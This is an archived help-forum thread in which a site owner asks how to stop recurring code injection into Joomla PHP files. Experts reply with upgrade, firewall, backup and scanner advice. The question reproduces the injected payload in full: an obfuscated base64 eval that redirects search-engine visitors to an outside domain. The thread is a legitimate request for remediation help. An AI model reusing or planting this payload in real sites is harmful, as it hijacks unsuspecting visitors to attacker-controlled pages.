Solved

Joomla Exploit

Posted on 2011-09-21
7
1,005 Views
Last Modified: 2012-05-12
We are being attacked weekly with the same code.

Added to the changelog, configuration, credits, license, index php files is the code (after the <?php>

I remove the code when i see the files have been modified which seems to be weekly... but they return.  

The code added is attached.

I know a resolution would be to upgrade to 1.7 Joomla but am hoping to find a more expedient and less costly for my client.
<?php	                                       	eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwokcWF6cGxtPWhlYWRlcnNfc2VudCgpOwppZiAoISRxYXpwbG0pewokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107CiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOwppZiAoJHVhZykgewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wcnNuYnJrLm9zYS5wbC8iKTsKCWV4aXQoKTsKCX0KfQp9Cgl9"));

Open in new window

0
Comment
Question by:bborner
7 Comments
 
LVL 13

Accepted Solution

by:
Andrew Derse earned 250 total points
ID: 36576543
Well for starters you should at least upgrade to Joomla 1.5.23.  Joomla 1.5.6 is much less secure than that.

Please let me know if you need help in finding the upgrade files.

Also, please check into RS Firewall, it does cost a little bit of $$, but it WILL help you in your fight against the hackers.

Main goal though is to get upgraded to 1.5.23 first.
0
 
LVL 13

Expert Comment

by:Andrew Derse
ID: 36576559
Here's a link for RS Firewall:
http://www.rsjoomla.com/joomla-extensions/joomla-security.html

And a link for the 1.5.23 upgrade from your version:
http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=5848

*Also make sure you backup your website on a regular basis.  Akeeba Backup will assist with that.
http://extensions.joomla.org/extensions/access-a-security/site-security/backup/1606

Please let me know if you need any additional help.
0
 

Author Comment

by:bborner
ID: 36577975
Great advice ... will take it one step at a time starting with akeeba.
Will get back to you with progress.
Thanks
0
Live: Real-Time Solutions, Start Here

Receive instant 1:1 support from technology experts, using our real-time conversation and whiteboard interface. Your first 5 minutes are always free.

 
LVL 13

Expert Comment

by:Andrew Derse
ID: 36579533
Sounds good.
0
 
LVL 15

Expert Comment

by:Russell_Venable
ID: 36581860
Can't tell you what there using as the code you posted got edited by the moderators, it seems atleast.
0
 
LVL 15

Assisted Solution

by:Russell_Venable
Russell_Venable earned 250 total points
ID: 36582192
You can scan your website using the joomla vulnerability scanner which is made by yehs, which is a ethical hacker group dedicated in finding and patching these vulnerability's. So credentials are valid and trustable.

You can download it from owsap or there own site both links are on this page. https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project

Atleat this will give you a idea of what fixes you need to look out for ad what php file is giving the problem.


0
 
LVL 13

Expert Comment

by:StormITSolutions
ID: 36585995
Yeah the code seems edited so i cant see where they are attacking

Feel free to email me the code via the contact form on our profile site

Should be fairly easy to block this, we had one similar through com_properties that looks like a similar exploit

also get Admin Tools as it adds lots of features to the site for security protection

Storm
0

Featured Post

Gigs: Get Your Project Delivered by an Expert

Select from freelancers specializing in everything from database administration to programming, who have proven themselves as experts in their field. Hire the best, collaborate easily, pay securely and get projects done right.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

SHARE your personal details only on a NEED to basis. Take CHARGE and SECURE your IDENTITY. How do I then PROTECT myself and stay in charge of my own Personal details (and) - MY own WAY...
Read about achieving the basic levels of HRIS security in the workplace.
With Secure Portal Encryption, the recipient is sent a link to their email address directing them to the email laundry delivery page. From there, the recipient will be required to enter a user name and password to enter the page. Once the recipient …
The Email Laundry PDF encryption service allows companies to send confidential encrypted  emails to anybody. The PDF document can also contain attachments that are embedded in the encrypted PDF. The password is randomly generated by The Email Laundr…

786 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question